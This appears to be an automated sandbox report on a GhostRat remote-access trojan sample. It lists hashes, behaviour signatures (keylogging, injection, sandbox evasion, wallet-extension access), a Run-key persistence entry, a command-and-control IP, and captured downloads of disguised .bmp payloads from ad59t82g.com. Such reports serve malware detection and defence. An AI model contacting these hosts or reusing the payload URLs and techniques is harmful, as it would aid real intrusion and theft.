Edit tour

Windows Analysis Report
N6xnw0iEGs.exe

Overview

General Information

Sample name:	N6xnw0iEGs.exe renamed because original name is a hash value
Original sample name:	c9817d415d34ea3ae07094dae818ffe8e3fb1d5bcb13eb0e65fd361b7859eda7.exe
Analysis ID:	1511252
MD5:	8f6f306ba501a7e435db720bb97cb1e4
SHA1:	66de656287a3bff5a7bf89f9a0972d679e3afe3f
SHA256:	c9817d415d34ea3ae07094dae818ffe8e3fb1d5bcb13eb0e65fd361b7859eda7
Tags:	ad59t82g-comexe
Infos:

Detection

GhostRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GhostRat

AI detected suspicious sample

Contains functionality to capture and log keystrokes

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Contains functionalty to change the wallpaper

Drops password protected ZIP file

Found API chain indicative of debugger detection

Hides threads from debuggers

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Tries to access browser extension known for cryptocurrency wallets

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to evade analysis by execution special instruction (VM detection)

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a global mouse hook

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

N6xnw0iEGs.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\N6xnw0iEGs.exe" MD5: 8F6F306BA501A7E435DB720BB97CB1E4)

Fj0RhXL.exe (PID: 5408 cmdline: "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)

Fj0RhXL.exe (PID: 7316 cmdline: "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)

Fj0RhXL.exe (PID: 1432 cmdline: "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000003.3557268129.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000003.3557221510.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000003.3377534559.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000003.3095889918.0000000004F91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000003.3217861470.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000003.3095889918.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000003.3217903493.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000002.3623492196.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000003.3040097047.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000002.3622694265.0000000003B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000003.3058368131.0000000003A80000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000006.00000003.3377599757.0000000004FD5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: Fj0RhXL.exe PID: 5408	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
6.3.Fj0RhXL.exe.4fd5a53.4.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.5.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.2.Fj0RhXL.exe.3d80000.5.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.13a300b.1.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.2.Fj0RhXL.exe.3bf05bf.4.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.2.Fj0RhXL.exe.3b41004.3.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.13e7a73.0.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.2.Fj0RhXL.exe.4fd5a53.6.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.4.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.9.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.2.Fj0RhXL.exe.3d80000.5.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.6.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.3.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.8.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.7.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.2.Fj0RhXL.exe.3bf05bf.4.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.7.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.13e7a73.0.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.2.Fj0RhXL.exe.3b41004.3.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.5.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.3a81053.2.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.13a300b.1.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.6.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.3.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.9.raw.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.4fd5a53.8.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.3.Fj0RhXL.exe.3a81053.2.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
6.2.Fj0RhXL.exe.4fd5a53.6.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\N6xnw0iEGs.exe, ProcessId: 7572, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS

Suricata Signatures

ET MALWARE Anonymous RAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-14T18:31:39.230500+0200	2052875	1	A Network Trojan was detected	192.168.2.4	49740	45.201.245.153	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-14T18:31:06.970884+0200	2803304	3	Unknown Traffic	192.168.2.4	49737	172.67.203.195	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\IemFNe\t4d.tmp

Avira: detection malicious, Label: DR/FakePic.Gen

Multi AV Scanner detection for submitted file

Source: N6xnw0iEGs.exe	ReversingLabs: Detection: 21%
Source: N6xnw0iEGs.exe	Virustotal: Detection: 29%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: N6xnw0iEGs.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
Source:	Binary string: J:\work\res_checker\netdia\Release\NetDiagnotor.pdb source: N6xnw0iEGs.exe
Source:	Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: z:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: x:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: v:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: t:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: r:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: p:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: n:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: l:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: j:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: h:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: f:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: b:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: y:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: w:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: u:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: s:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: q:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: o:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: m:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: k:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: i:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: g:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	File opened: c:	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	File opened: [:	Jump to behavior

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D895F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,

6_2_03D895F0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49740 -> 45.201.245.153:80

Source: global traffic	HTTP traffic detected: GET /1/tant.bmp HTTP/1.1Host: ad59t82g.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /1/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /1/t1.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com

Source: Joe Sandbox View

ASN Name: KINGCORP-KHOpenNetISPCambodiaKH KINGCORP-KHOpenNetISPCambodiaKH

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49737 -> 172.67.203.195:80

Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153
Source: unknown	TCP traffic detected without corresponding DNS query: 45.201.245.153

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_02F02FA0 recv,select,recv,

6_2_02F02FA0

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Sep 2024 16:31:07 GMTContent-Type: image/x-ms-bmpContent-Length: 6443425Connection: keep-aliveLast-Modified: Thu, 08 Aug 2024 15:32:21 GMTETag: "66b4e505-6251a1"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 0Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cE0CrtBjdkE7Lx1GVUwOsKz4LZG5svqBTJQ9CUSZ3tE1n8BLAW%2F9UIYH14YNCLQkmPr7dU2MX9xNOibSKDgWkdriiD3Zhlj61JkreOyxtP4sNZFCQ2EUwMLCSK83jEg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c31c3fa9aab43d7-EWRalt-svc: h3=":443"; ma=86400Data Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c 96 53 a8 93 1a 43 8a 40 72 c9 cd 4d f3 75 0b d3 e0 d6 60 25 ae d3 66 4a 4b 5d b6 5e 17 3b 24 29 1b a7 07 28 1d 48 ce 8a 24 dd e5 0f 57 31 3b 63 bc e1 b9 39 3b 66 4c 46 9f 14 f3 c4 02 68 95 c3 21 3d 7c d0 7a 12 01 3c 08 32 de 1b 41 20 0a ef 8d 8e 3c cb 3d 54 8e 28 0e 74 2d a5 bb e4 c7 6a f7 4b 3c 19 7a 3e b3 55 75 93 98 a4 85 fc 3e 61 cb 06 22 80 2d 2c 37 b8 2a 5c b0 51 a6 6b 96 fb ee 27 23 f4 d0 04 a5 0c 50 95 84 0f 9b 47 8f 5b 48 3b 2a bb f4 f8 7d 94 68 ed 84 fa fd 02 9b 9e ae f0 7d 19 69 b4 c0 78 83 f0 ef 95 a1 21 73 56 4e d7 8b 38 9a ed e1 e8 8f 47 a6 26 5f 23 ea 1f c9 5d 4a c2 09 00 e3 5f 67 5d 15 a9 47 b3 f4 9d ca 98 2c 66 e6 Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+||x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=|z<2A <=T(t-jK<z>Uu>a"-,7*\Qk'#PG[H;*}h}ix!sVN8G&_#]J_g]G,f

Source: global traffic	HTTP traffic detected: GET /1/tant.bmp HTTP/1.1Host: ad59t82g.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /1/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /1/t1.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com

Source: global traffic

DNS traffic detected: DNS query: ad59t82g.com

Source: N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t1.bmp
Source: N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/1/t1.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:
Source: N6xnw0iEGs.exe, 00000000.00000002.2991068983.000000000244D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/1/tant.bmp
Source: N6xnw0iEGs.exe, 00000000.00000002.2987931723.000000000019C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/1/tant.bmpwininetmsvcrt
Source: N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/1/text.bmpC:
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://code.jquery.com/jquery-1.10.1.min.js
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://tianyu.gm.163.com/submit_sub.html?paper_id=2481
Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://tianyu.gm.163.com/user_help.html?paper_id=2017#
Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://tianyu.gm.163.com/user_help.html?paper_id=3103
Source: libcef.dll.0.dr	String found in binary or memory: http://www.astro.com/swisseph.
Source: Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	String found in binary or memory: http://www.astrolog.org/astrolog.htm
Source: N6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	String found in binary or memory: http://www.astrolog.org/astrolog.htmMain
Source: Fj0RhXL.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: libcef.dll.0.dr	String found in binary or memory: http://www.gnu.org
Source: Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	String found in binary or memory: https://data.iana.org/time-zones/tz-link.html
Source: N6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.dr	String found in binary or memory: https://data.iana.org/time-zones/tz-link.htmlPostScript
Source: Fj0RhXL.exe, 00000006.00000002.3620905823.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078134311.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157887765.00000000007F3000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.ubi.com/
Source: Fj0RhXL.exe, 00000006.00000002.3620905823.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078134311.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157887765.00000000007F3000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired
